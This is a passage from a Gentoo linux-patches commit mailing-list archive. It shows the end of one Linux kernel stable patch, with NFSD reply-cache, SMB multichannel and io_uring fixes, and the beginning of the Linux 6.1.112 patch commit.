+-	csum = csum_partial(p, len, 0);
+-	csum_len -= len;
++	if (subbuf.head[0].iov_len) {
++		len = min_t(unsigned int, subbuf.head[0].iov_len, remaining);
++		csum = csum_partial(subbuf.head[0].iov_base, len, csum);
++		remaining -= len;
++	}
+ 
+ 	/* Continue into page array */
+-	idx = buf->page_base / PAGE_SIZE;
+-	base = buf->page_base & ~PAGE_MASK;
+-	while (csum_len) {
+-		p = page_address(buf->pages[idx]) + base;
+-		len = min_t(size_t, PAGE_SIZE - base, csum_len);
++	idx = subbuf.page_base / PAGE_SIZE;
++	base = subbuf.page_base & ~PAGE_MASK;
++	while (remaining) {
++		p = page_address(subbuf.pages[idx]) + base;
++		len = min_t(unsigned int, PAGE_SIZE - base, remaining);
+ 		csum = csum_partial(p, len, csum);
+-		csum_len -= len;
++		remaining -= len;
+ 		base = 0;
+ 		++idx;
+ 	}
+@@ -408,6 +428,8 @@ out:
+ /**
+  * nfsd_cache_lookup - Find an entry in the duplicate reply cache
+  * @rqstp: Incoming Call to find
++ * @start: starting byte in @rqstp->rq_arg of the NFS Call header
++ * @len: size of the NFS Call header, in bytes
+  *
+  * Try to find an entry matching the current call in the cache. When none
+  * is found, we try to grab the oldest expired entry off the LRU list. If
+@@ -420,7 +442,8 @@ out:
+  *   %RC_REPLY: Reply from cache
+  *   %RC_DROPIT: Do not process the request further
+  */
+-int nfsd_cache_lookup(struct svc_rqst *rqstp)
++int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
++		      unsigned int len)
+ {
+ 	struct nfsd_net		*nn;
+ 	struct svc_cacherep	*rp, *found;
+@@ -435,7 +458,7 @@ int nfsd_cache_lookup(struct svc_rqst *rqstp)
+ 		goto out;
+ 	}
+ 
+-	csum = nfsd_cache_csum(rqstp);
++	csum = nfsd_cache_csum(&rqstp->rq_arg, start, len);
+ 
+ 	/*
+ 	 * Since the common case is a cache miss followed by an insert,
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 6b20f285f3ca6..f6cc99af81925 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -1027,6 +1027,8 @@ out:
+ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ {
+ 	const struct svc_procedure *proc = rqstp->rq_procinfo;
++	unsigned int start, len;
++	__be32 *nfs_reply;
+ 
+ 	/*
+ 	 * Give the xdr decoder a chance to change this if it wants
+@@ -1035,10 +1037,18 @@ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ 	rqstp->rq_cachetype = proc->pc_cachetype;
+ 
+ 	svcxdr_init_decode(rqstp);
++
++	/*
++	 * ->pc_decode advances the argument stream past the NFS
++	 * Call header, so grab the header's starting location and
++	 * size now for the call to nfsd_cache_lookup().
++	 */
++	start = xdr_stream_pos(&rqstp->rq_arg_stream);
++	len = xdr_stream_remaining(&rqstp->rq_arg_stream);
+ 	if (!proc->pc_decode(rqstp, &rqstp->rq_arg_stream))
+ 		goto out_decode_err;
+ 
+-	switch (nfsd_cache_lookup(rqstp)) {
++	switch (nfsd_cache_lookup(rqstp, start, len)) {
+ 	case RC_DOIT:
+ 		break;
+ 	case RC_REPLY:
+@@ -1053,6 +1063,7 @@ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ 	 */
+ 	svcxdr_init_encode(rqstp);
+ 
++	nfs_reply = xdr_inline_decode(&rqstp->rq_res_stream, 0);
+ 	*statp = proc->pc_func(rqstp);
+ 	if (*statp == rpc_drop_reply || test_bit(RQ_DROPME, &rqstp->rq_flags))
+ 		goto out_update_drop;
+@@ -1060,7 +1071,7 @@ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ 	if (!proc->pc_encode(rqstp, &rqstp->rq_res_stream))
+ 		goto out_encode_err;
+ 
+-	nfsd_cache_update(rqstp, rqstp->rq_cachetype, statp + 1);
++	nfsd_cache_update(rqstp, rqstp->rq_cachetype, nfs_reply);
+ out_cached_reply:
+ 	return 1;
+ 
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index ed396b186c5a4..0acb455368f23 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -220,6 +220,8 @@ static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
+ 	struct cifs_ses *ses;
+ 	struct cifs_tcon *tcon;
+ 	struct cifs_server_iface *iface;
++	size_t iface_weight = 0, iface_min_speed = 0;
++	struct cifs_server_iface *last_iface = NULL;
+ 	int c, i, j;
+ 
+ 	seq_puts(m,
+@@ -457,13 +459,29 @@ skip_rdma:
+ 
+ 			spin_lock(&ses->iface_lock);
+ 			if (ses->iface_count)
+-				seq_printf(m, "\n\n\tServer interfaces: %zu",
+-					   ses->iface_count);
++				seq_printf(m, "\n\n\tServer interfaces: %zu"
++					   "\tLast updated: %lu seconds ago",
++					   ses->iface_count,
++					   (jiffies - ses->iface_last_update) / HZ);
++
++			last_iface = list_last_entry(&ses->iface_list,
++						     struct cifs_server_iface,
++						     iface_head);
++			iface_min_speed = last_iface->speed;
++
+ 			j = 0;
+ 			list_for_each_entry(iface, &ses->iface_list,
+ 						 iface_head) {
+ 				seq_printf(m, "\n\t%d)", ++j);
+ 				cifs_dump_iface(m, iface);
++
++				iface_weight = iface->speed / iface_min_speed;
++				seq_printf(m, "\t\tWeight (cur,total): (%zu,%zu)"
++					   "\n\t\tAllocated channels: %u\n",
++					   iface->weight_fulfilled,
++					   iface_weight,
++					   iface->num_channels);
++
+ 				if (is_ses_using_iface(ses, iface))
+ 					seq_puts(m, "\t\t[CONNECTED]\n");
+ 			}
+diff --git a/fs/smb/client/cifs_ioctl.h b/fs/smb/client/cifs_ioctl.h
+index d86d78d5bfdc1..26327442e383b 100644
+--- a/fs/smb/client/cifs_ioctl.h
++++ b/fs/smb/client/cifs_ioctl.h
+@@ -26,6 +26,11 @@ struct smb_mnt_fs_info {
+ 	__u64   cifs_posix_caps;
+ } __packed;
+ 
++struct smb_mnt_tcon_info {
++	__u32	tid;
++	__u64	session_id;
++} __packed;
++
+ struct smb_snapshot_array {
+ 	__u32	number_of_snapshots;
+ 	__u32	number_of_snapshots_returned;
+@@ -108,7 +113,8 @@ struct smb3_notify_info {
+ #define CIFS_IOC_NOTIFY _IOW(CIFS_IOCTL_MAGIC, 9, struct smb3_notify)
+ #define CIFS_DUMP_FULL_KEY _IOWR(CIFS_IOCTL_MAGIC, 10, struct smb3_full_key_debug_info)
+ #define CIFS_IOC_NOTIFY_INFO _IOWR(CIFS_IOCTL_MAGIC, 11, struct smb3_notify_info)
+-#define CIFS_IOC_SHUTDOWN _IOR ('X', 125, __u32)
++#define CIFS_IOC_GET_TCON_INFO _IOR(CIFS_IOCTL_MAGIC, 12, struct smb_mnt_tcon_info)
++#define CIFS_IOC_SHUTDOWN _IOR('X', 125, __u32)
+ 
+ /*
+  * Flags for going down operation
+diff --git a/fs/smb/client/cifsfs.h b/fs/smb/client/cifsfs.h
+index b6c38896fb2db..a1d8791c4fcd2 100644
+--- a/fs/smb/client/cifsfs.h
++++ b/fs/smb/client/cifsfs.h
+@@ -105,8 +105,8 @@ extern int cifs_lock(struct file *, int, struct file_lock *);
+ extern int cifs_fsync(struct file *, loff_t, loff_t, int);
+ extern int cifs_strict_fsync(struct file *, loff_t, loff_t, int);
+ extern int cifs_flush(struct file *, fl_owner_t id);
+-extern int cifs_file_mmap(struct file * , struct vm_area_struct *);
+-extern int cifs_file_strict_mmap(struct file * , struct vm_area_struct *);
++extern int cifs_file_mmap(struct file *file, struct vm_area_struct *vma);
++extern int cifs_file_strict_mmap(struct file *file, struct vm_area_struct *vma);
+ extern const struct file_operations cifs_dir_ops;
+ extern int cifs_dir_open(struct inode *inode, struct file *file);
+ extern int cifs_readdir(struct file *file, struct dir_context *ctx);
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 39602f39aea8f..2e814eadd6aef 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -788,6 +788,7 @@ static inline unsigned int
+ in_flight(struct TCP_Server_Info *server)
+ {
+ 	unsigned int num;
++
+ 	spin_lock(&server->req_lock);
+ 	num = server->in_flight;
+ 	spin_unlock(&server->req_lock);
+@@ -798,6 +799,7 @@ static inline bool
+ has_credits(struct TCP_Server_Info *server, int *credits, int num_credits)
+ {
+ 	int num;
++
+ 	spin_lock(&server->req_lock);
+ 	num = *credits;
+ 	spin_unlock(&server->req_lock);
+@@ -954,6 +956,8 @@ struct cifs_server_iface {
+ 	struct list_head iface_head;
+ 	struct kref refcount;
+ 	size_t speed;
++	size_t weight_fulfilled;
++	unsigned int num_channels;
+ 	unsigned int rdma_capable : 1;
+ 	unsigned int rss_capable : 1;
+ 	unsigned int is_active : 1; /* unset if non existent */
+@@ -991,7 +995,7 @@ struct cifs_ses {
+ 	struct TCP_Server_Info *server;	/* pointer to server info */
+ 	int ses_count;		/* reference counter */
+ 	enum ses_status_enum ses_status;  /* updates protected by cifs_tcp_ses_lock */
+-	unsigned overrideSecFlg;  /* if non-zero override global sec flags */
++	unsigned int overrideSecFlg; /* if non-zero override global sec flags */
+ 	char *serverOS;		/* name of operating system underlying server */
+ 	char *serverNOS;	/* name of network operating system of server */
+ 	char *serverDomain;	/* security realm of server */
+@@ -1347,7 +1351,7 @@ struct cifsFileInfo {
+ 	__u32 pid;		/* process id who opened file */
+ 	struct cifs_fid fid;	/* file id from remote */
+ 	struct list_head rlist; /* reconnect list */
+-	/* BB add lock scope info here if needed */ ;
++	/* BB add lock scope info here if needed */
+ 	/* lock scope id (0 if none) */
+ 	struct dentry *dentry;
+ 	struct tcon_link *tlink;
+@@ -1735,6 +1739,7 @@ static inline void free_dfs_info_array(struct dfs_info3_param *param,
+ 				       int number_of_items)
+ {
+ 	int i;
++
+ 	if ((number_of_items == 0) || (param == NULL))
+ 		return;
+ 	for (i = 0; i < number_of_items; i++) {
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 6ca1e00b3f76a..5b19918938346 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -2070,6 +2070,12 @@ void cifs_put_smb_ses(struct cifs_ses *ses)
+ 		}
+ 	}
+ 
++	/* we now account for primary channel in iface->refcount */
++	if (ses->chans[0].iface) {
++		kref_put(&ses->chans[0].iface->refcount, release_iface);
++		ses->chans[0].server = NULL;
++	}
++
+ 	sesInfoFree(ses);
+ 	cifs_put_tcp_session(server, 0);
+ }
+diff --git a/fs/smb/client/ioctl.c b/fs/smb/client/ioctl.c
+index 6419ec47c2a85..ae9905e2b9d4a 100644
+--- a/fs/smb/client/ioctl.c
++++ b/fs/smb/client/ioctl.c
+@@ -117,6 +117,20 @@ out_drop_write:
+ 	return rc;
+ }
+ 
++static long smb_mnt_get_tcon_info(struct cifs_tcon *tcon, void __user *arg)
++{
++	int rc = 0;
++	struct smb_mnt_tcon_info tcon_inf;
++
++	tcon_inf.tid = tcon->tid;
++	tcon_inf.session_id = tcon->ses->Suid;
++
++	if (copy_to_user(arg, &tcon_inf, sizeof(struct smb_mnt_tcon_info)))
++		rc = -EFAULT;
++
++	return rc;
++}
++
+ static long smb_mnt_get_fsinfo(unsigned int xid, struct cifs_tcon *tcon,
+ 				void __user *arg)
+ {
+@@ -410,6 +424,17 @@ long cifs_ioctl(struct file *filep, unsigned int command, unsigned long arg)
+ 			tcon = tlink_tcon(pSMBFile->tlink);
+ 			rc = smb_mnt_get_fsinfo(xid, tcon, (void __user *)arg);
+ 			break;
++		case CIFS_IOC_GET_TCON_INFO:
++			cifs_sb = CIFS_SB(inode->i_sb);
++			tlink = cifs_sb_tlink(cifs_sb);
++			if (IS_ERR(tlink)) {
++				rc = PTR_ERR(tlink);
++				break;
++			}
++			tcon = tlink_tcon(tlink);
++			rc = smb_mnt_get_tcon_info(tcon, (void __user *)arg);
++			cifs_put_tlink(tlink);
++			break;
+ 		case CIFS_ENUMERATE_SNAPSHOTS:
+ 			if (pSMBFile == NULL)
+ 				break;
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+index f0d164873500b..634035bcb9347 100644
+--- a/fs/smb/client/sess.c
++++ b/fs/smb/client/sess.c
+@@ -164,7 +164,9 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 	int left;
+ 	int rc = 0;
+ 	int tries = 0;
++	size_t iface_weight = 0, iface_min_speed = 0;
+ 	struct cifs_server_iface *iface = NULL, *niface = NULL;
++	struct cifs_server_iface *last_iface = NULL;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 
+@@ -192,21 +194,11 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 	}
+ 	spin_unlock(&ses->chan_lock);
+ 
+-	/*
+-	 * Keep connecting to same, fastest, iface for all channels as
+-	 * long as its RSS. Try next fastest one if not RSS or channel
+-	 * creation fails.
+-	 */
+-	spin_lock(&ses->iface_lock);
+-	iface = list_first_entry(&ses->iface_list, struct cifs_server_iface,
+-				 iface_head);
+-	spin_unlock(&ses->iface_lock);
+-
+ 	while (left > 0) {
+ 
+ 		tries++;
+ 		if (tries > 3*ses->chan_max) {
+-			cifs_dbg(FYI, "too many channel open attempts (%d channels left to open)\n",
++			cifs_dbg(VFS, "too many channel open attempts (%d channels left to open)\n",
+ 				 left);
+ 			break;
+ 		}
+@@ -214,17 +206,35 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 		spin_lock(&ses->iface_lock);
+ 		if (!ses->iface_count) {
+ 			spin_unlock(&ses->iface_lock);
++			cifs_dbg(VFS, "server %s does not advertise interfaces\n",
++				      ses->server->hostname);
+ 			break;
+ 		}
+ 
++		if (!iface)
++			iface = list_first_entry(&ses->iface_list, struct cifs_server_iface,
++						 iface_head);
++		last_iface = list_last_entry(&ses->iface_list, struct cifs_server_iface,
++					     iface_head);
++		iface_min_speed = last_iface->speed;
++
+ 		list_for_each_entry_safe_from(iface, niface, &ses->iface_list,
+ 				    iface_head) {
++			/* do not mix rdma and non-rdma interfaces */
++			if (iface->rdma_capable != ses->server->rdma)
++				continue;
++
+ 			/* skip ifaces that are unusable */
+ 			if (!iface->is_active ||
+ 			    (is_ses_using_iface(ses, iface) &&
+-			     !iface->rss_capable)) {
++			     !iface->rss_capable))
++				continue;
++
++			/* check if we already allocated enough channels */
++			iface_weight = iface->speed / iface_min_speed;
++
++			if (iface->weight_fulfilled >= iface_weight)
+ 				continue;
+-			}
+ 
+ 			/* take ref before unlock */
+ 			kref_get(&iface->refcount);
+@@ -241,10 +251,21 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 				continue;
+ 			}
+ 
+-			cifs_dbg(FYI, "successfully opened new channel on iface:%pIS\n",
++			iface->num_channels++;
++			iface->weight_fulfilled++;
++			cifs_dbg(VFS, "successfully opened new channel on iface:%pIS\n",
+ 				 &iface->sockaddr);
+ 			break;
+ 		}
++
++		/* reached end of list. reset weight_fulfilled and start over */
++		if (list_entry_is_head(iface, &ses->iface_list, iface_head)) {
++			list_for_each_entry(iface, &ses->iface_list, iface_head)
++				iface->weight_fulfilled = 0;
++			spin_unlock(&ses->iface_lock);
++			iface = NULL;
++			continue;
++		}
+ 		spin_unlock(&ses->iface_lock);
+ 
+ 		left--;
+@@ -263,8 +284,11 @@ int
+ cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+ {
+ 	unsigned int chan_index;
++	size_t iface_weight = 0, iface_min_speed = 0;
+ 	struct cifs_server_iface *iface = NULL;
+ 	struct cifs_server_iface *old_iface = NULL;
++	struct cifs_server_iface *last_iface = NULL;
++	struct sockaddr_storage ss;
+ 	int rc = 0;
+ 
+ 	spin_lock(&ses->chan_lock);
+@@ -283,14 +307,49 @@ cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+ 	}
+ 	spin_unlock(&ses->chan_lock);
+ 
++	spin_lock(&server->srv_lock);
++	ss = server->dstaddr;
++	spin_unlock(&server->srv_lock);
++
+ 	spin_lock(&ses->iface_lock);
++	if (!ses->iface_count) {
++		spin_unlock(&ses->iface_lock);
++		cifs_dbg(VFS, "server %s does not advertise interfaces\n", ses->server->hostname);
++		return 0;
++	}
++
++	last_iface = list_last_entry(&ses->iface_list, struct cifs_server_iface,
++				     iface_head);
++	iface_min_speed = last_iface->speed;
++
+ 	/* then look for a new one */
+ 	list_for_each_entry(iface, &ses->iface_list, iface_head) {
++		if (!chan_index) {
++			/* if we're trying to get the updated iface for primary channel */
++			if (!cifs_match_ipaddr((struct sockaddr *) &ss,
++					       (struct sockaddr *) &iface->sockaddr))
++				continue;
++
++			kref_get(&iface->refcount);
++			break;
++		}
++
++		/* do not mix rdma and non-rdma interfaces */
++		if (iface->rdma_capable != server->rdma)
++			continue;
++
+ 		if (!iface->is_active ||
+ 		    (is_ses_using_iface(ses, iface) &&
+ 		     !iface->rss_capable)) {
+ 			continue;
+ 		}
++
++		/* check if we already allocated enough channels */
++		iface_weight = iface->speed / iface_min_speed;
++
++		if (iface->weight_fulfilled >= iface_weight)
++			continue;
++
+ 		kref_get(&iface->refcount);
+ 		break;
+ 	}
+@@ -301,16 +360,41 @@ cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+ 		cifs_dbg(FYI, "unable to find a suitable iface\n");
+ 	}
+ 
++	if (!chan_index && !iface) {
++		cifs_dbg(FYI, "unable to get the interface matching: %pIS\n",
++			 &ss);
++		spin_unlock(&ses->iface_lock);
++		return 0;
++	}
++
+ 	/* now drop the ref to the current iface */
+ 	if (old_iface && iface) {
+ 		cifs_dbg(FYI, "replacing iface: %pIS with %pIS\n",
+ 			 &old_iface->sockaddr,
+ 			 &iface->sockaddr);
++
++		old_iface->num_channels--;
++		if (old_iface->weight_fulfilled)
++			old_iface->weight_fulfilled--;
++		iface->num_channels++;
++		iface->weight_fulfilled++;
++
+ 		kref_put(&old_iface->refcount, release_iface);
+ 	} else if (old_iface) {
+ 		cifs_dbg(FYI, "releasing ref to iface: %pIS\n",
+ 			 &old_iface->sockaddr);
++
++		old_iface->num_channels--;
++		if (old_iface->weight_fulfilled)
++			old_iface->weight_fulfilled--;
++
+ 		kref_put(&old_iface->refcount, release_iface);
++	} else if (!chan_index) {
++		/* special case: update interface for primary channel */
++		cifs_dbg(FYI, "referencing primary channel iface: %pIS\n",
++			 &iface->sockaddr);
++		iface->num_channels++;
++		iface->weight_fulfilled++;
+ 	} else {
+ 		WARN_ON(!iface);
+ 		cifs_dbg(FYI, "adding new iface: %pIS\n", &iface->sockaddr);
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 2c1898803279a..4cc56e4695fbc 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -752,6 +752,7 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	unsigned int ret_data_len = 0;
+ 	struct network_interface_info_ioctl_rsp *out_buf = NULL;
+ 	struct cifs_ses *ses = tcon->ses;
++	struct TCP_Server_Info *pserver;
+ 
+ 	/* do not query too frequently */
+ 	if (ses->iface_last_update &&
+@@ -776,6 +777,11 @@ SMB3_request_interfaces(const unsigned int xid, struct cifs_tcon *tcon, bool in_
+ 	if (rc)
+ 		goto out;
+ 
++	/* check if iface is still active */
++	pserver = ses->chans[0].server;
++	if (pserver && !cifs_chan_is_iface_active(ses, pserver))
++		cifs_chan_update_iface(ses, pserver);
++
+ out:
+ 	kfree(out_buf);
+ 	return rc;
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 58f5ab29c11a7..b688069b17944 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -653,10 +653,13 @@ struct hid_device {							/* device report descriptor */
+ 	struct list_head debug_list;
+ 	spinlock_t  debug_list_lock;
+ 	wait_queue_head_t debug_wait;
++	struct kref			ref;
+ 
+ 	unsigned int id;						/* system unique id */
+ };
+ 
++void hiddev_free(struct kref *ref);
++
+ #define to_hid_device(pdev) \
+ 	container_of(pdev, struct hid_device, dev)
+ 
+diff --git a/io_uring/fs.c b/io_uring/fs.c
+index 27676e0150049..abf4295db0caf 100644
+--- a/io_uring/fs.c
++++ b/io_uring/fs.c
+@@ -254,7 +254,7 @@ int io_linkat_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 	newf = u64_to_user_ptr(READ_ONCE(sqe->addr2));
+ 	lnk->flags = READ_ONCE(sqe->hardlink_flags);
+ 
+-	lnk->oldpath = getname(oldf);
++	lnk->oldpath = getname_uflags(oldf, lnk->flags);
+ 	if (IS_ERR(lnk->oldpath))
+ 		return PTR_ERR(lnk->oldpath);
+ 
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index cce95164204f3..7ada0339b3870 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -1351,7 +1351,7 @@ int io_import_fixed(int ddir, struct iov_iter *iter,
+ 		 */
+ 		const struct bio_vec *bvec = imu->bvec;
+ 
+-		if (offset <= bvec->bv_len) {
++		if (offset < bvec->bv_len) {
+ 			iov_iter_advance(iter, offset);
+ 		} else {
+ 			unsigned long seg_skip;
+diff --git a/kernel/locking/lockdep.c b/kernel/locking/lockdep.c
+index 0224b0329d011..3b38303ed27b3 100644
+--- a/kernel/locking/lockdep.c
++++ b/kernel/locking/lockdep.c
+@@ -3453,7 +3453,8 @@ static int alloc_chain_hlocks(int req)
+ 		size = chain_block_size(curr);
+ 		if (likely(size >= req)) {
+ 			del_chain_block(0, size, chain_block_next(curr));
+-			add_chain_block(curr + req, size - req);
++			if (size > req)
++				add_chain_block(curr + req, size - req);
+ 			return curr;
+ 		}
+ 	}
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index a477b7fb8aa33..c597cfebb0e86 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -828,6 +828,10 @@ void __init kfence_alloc_pool(void)
+ 	if (!kfence_sample_interval)
+ 		return;
+ 
++	/* if the pool has already been initialized by arch, skip the below. */
++	if (__kfence_pool)
++		return;
++
+ 	__kfence_pool = memblock_alloc(KFENCE_POOL_SIZE, PAGE_SIZE);
+ 
+ 	if (!__kfence_pool)
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 9cbaae4f5ee71..474f391fab35d 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -780,7 +780,7 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
+ 			goto reject_redirect;
+ 	}
+ 
+-	n = __ipv4_neigh_lookup(rt->dst.dev, new_gw);
++	n = __ipv4_neigh_lookup(rt->dst.dev, (__force u32)new_gw);
+ 	if (!n)
+ 		n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev);
+ 	if (!IS_ERR(n)) {
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index d676119984c09..b6609527dff62 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -585,8 +585,12 @@ static int smcr_clnt_conf_first_link(struct smc_sock *smc)
+ 	struct smc_llc_qentry *qentry;
+ 	int rc;
+ 
+-	/* receive CONFIRM LINK request from server over RoCE fabric */
+-	qentry = smc_llc_wait(link->lgr, NULL, SMC_LLC_WAIT_TIME,
++	/* Receive CONFIRM LINK request from server over RoCE fabric.
++	 * Increasing the client's timeout by twice as much as the server's
++	 * timeout by default can temporarily avoid decline messages of
++	 * both sides crossing or colliding
++	 */
++	qentry = smc_llc_wait(link->lgr, NULL, 2 * SMC_LLC_WAIT_TIME,
+ 			      SMC_LLC_CONFIRM_LINK);
+ 	if (!qentry) {
+ 		struct smc_clc_msg_decline dclc;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-09-30 16:04 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-09-30 16:04 UTC (permalink / raw
  To: gentoo-commits

commit:     53ee6518419336cae4db66bc8f48277f982eb2aa
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Sep 30 16:04:37 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Sep 30 16:04:37 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=53ee6518

Linux patch 6.1.112

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README              |    4 +
 1111_linux-6.1.112.patch | 3769 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3773 insertions(+)

diff --git a/0000_README b/0000_README
index f2f39ba5..2f4d2822 100644
--- a/0000_README
+++ b/0000_README
@@ -491,6 +491,10 @@ Patch:  1110_linux-6.1.111.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.111
 
+Patch:  1111_linux-6.1.112.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.112
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1111_linux-6.1.112.patch b/1111_linux-6.1.112.patch
new file mode 100644
index 00000000..7a84c1a4
--- /dev/null
+++ b/1111_linux-6.1.112.patch
@@ -0,0 +1,3769 @@
+diff --git a/Makefile b/Makefile
+index d2ff3ff026255a..bc0473d33c2fc5 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 111
++SUBLEVEL = 112
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/loongarch/include/asm/hw_irq.h b/arch/loongarch/include/asm/hw_irq.h
+index af4f4e8fbd858f..8156ffb6741591 100644
+--- a/arch/loongarch/include/asm/hw_irq.h
++++ b/arch/loongarch/include/asm/hw_irq.h
+@@ -9,6 +9,8 @@
+ 
+ extern atomic_t irq_err_count;
+ 
++#define ARCH_IRQ_INIT_FLAGS	IRQ_NOPROBE
++
+ /*
+  * interrupt-retrigger: NOP for now. This may not be appropriate for all
+  * machines, we'll see ...
+diff --git a/arch/loongarch/kernel/irq.c b/arch/loongarch/kernel/irq.c
+index 0524bf1169b741..4496649c9e68b1 100644
+--- a/arch/loongarch/kernel/irq.c
++++ b/arch/loongarch/kernel/irq.c
+@@ -122,9 +122,6 @@ void __init init_IRQ(void)
+ 		panic("IPI IRQ request failed\n");
+ #endif
+ 
+-	for (i = 0; i < NR_IRQS; i++)
+-		irq_set_noprobe(i);
+-
+ 	for_each_possible_cpu(i) {
+ 		page = alloc_pages_node(cpu_to_node(i), GFP_KERNEL, order);
+ 
+diff --git a/arch/microblaze/mm/init.c b/arch/microblaze/mm/init.c
+index 353fabdfcbc540..2a3248194d505b 100644
+--- a/arch/microblaze/mm/init.c
++++ b/arch/microblaze/mm/init.c
+@@ -193,11 +193,6 @@ asmlinkage void __init mmu_init(void)
+ {
+ 	unsigned int kstart, ksize;
+ 
+-	if (!memblock.reserved.cnt) {
+-		pr_emerg("Error memory count\n");
+-		machine_restart(NULL);
+-	}
+-
+ 	if ((u32) memblock.memory.regions[0].size < 0x400000) {
+ 		pr_emerg("Memory must be greater than 4MB\n");
+ 		machine_restart(NULL);
+diff --git a/arch/x86/kernel/cpu/mshyperv.c b/arch/x86/kernel/cpu/mshyperv.c
+index 9b039e9635e40c..542b818c0d20dc 100644
+--- a/arch/x86/kernel/cpu/mshyperv.c
++++ b/arch/x86/kernel/cpu/mshyperv.c
+@@ -324,6 +324,7 @@ static void __init ms_hyperv_init_platform(void)
+ 	    ms_hyperv.misc_features & HV_FEATURE_FREQUENCY_MSRS_AVAILABLE) {
+ 		x86_platform.calibrate_tsc = hv_get_tsc_khz;
+ 		x86_platform.calibrate_cpu = hv_get_tsc_khz;
++		setup_force_cpu_cap(X86_FEATURE_TSC_KNOWN_FREQ);
+ 	}
+ 
+ 	if (ms_hyperv.priv_high & HV_ISOLATION) {
+diff --git a/arch/x86/mm/init.c b/arch/x86/mm/init.c
+index 913287b9340c93..ed861ef33f80a5 100644
+--- a/arch/x86/mm/init.c
++++ b/arch/x86/mm/init.c
+@@ -262,21 +262,17 @@ static void __init probe_page_size_mask(void)
+ 	}
+ }
+ 
+-#define INTEL_MATCH(_model) { .vendor  = X86_VENDOR_INTEL,	\
+-			      .family  = 6,			\
+-			      .model = _model,			\
+-			    }
+ /*
+  * INVLPG may not properly flush Global entries
+  * on these CPUs when PCIDs are enabled.
+  */
+ static const struct x86_cpu_id invlpg_miss_ids[] = {
+-	INTEL_MATCH(INTEL_FAM6_ALDERLAKE   ),
+-	INTEL_MATCH(INTEL_FAM6_ALDERLAKE_L ),
+-	INTEL_MATCH(INTEL_FAM6_ALDERLAKE_N ),
+-	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE  ),
+-	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE_P),
+-	INTEL_MATCH(INTEL_FAM6_RAPTORLAKE_S),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE,      0),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_L,    0),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_N,    0),
++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,     0),
++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,   0),
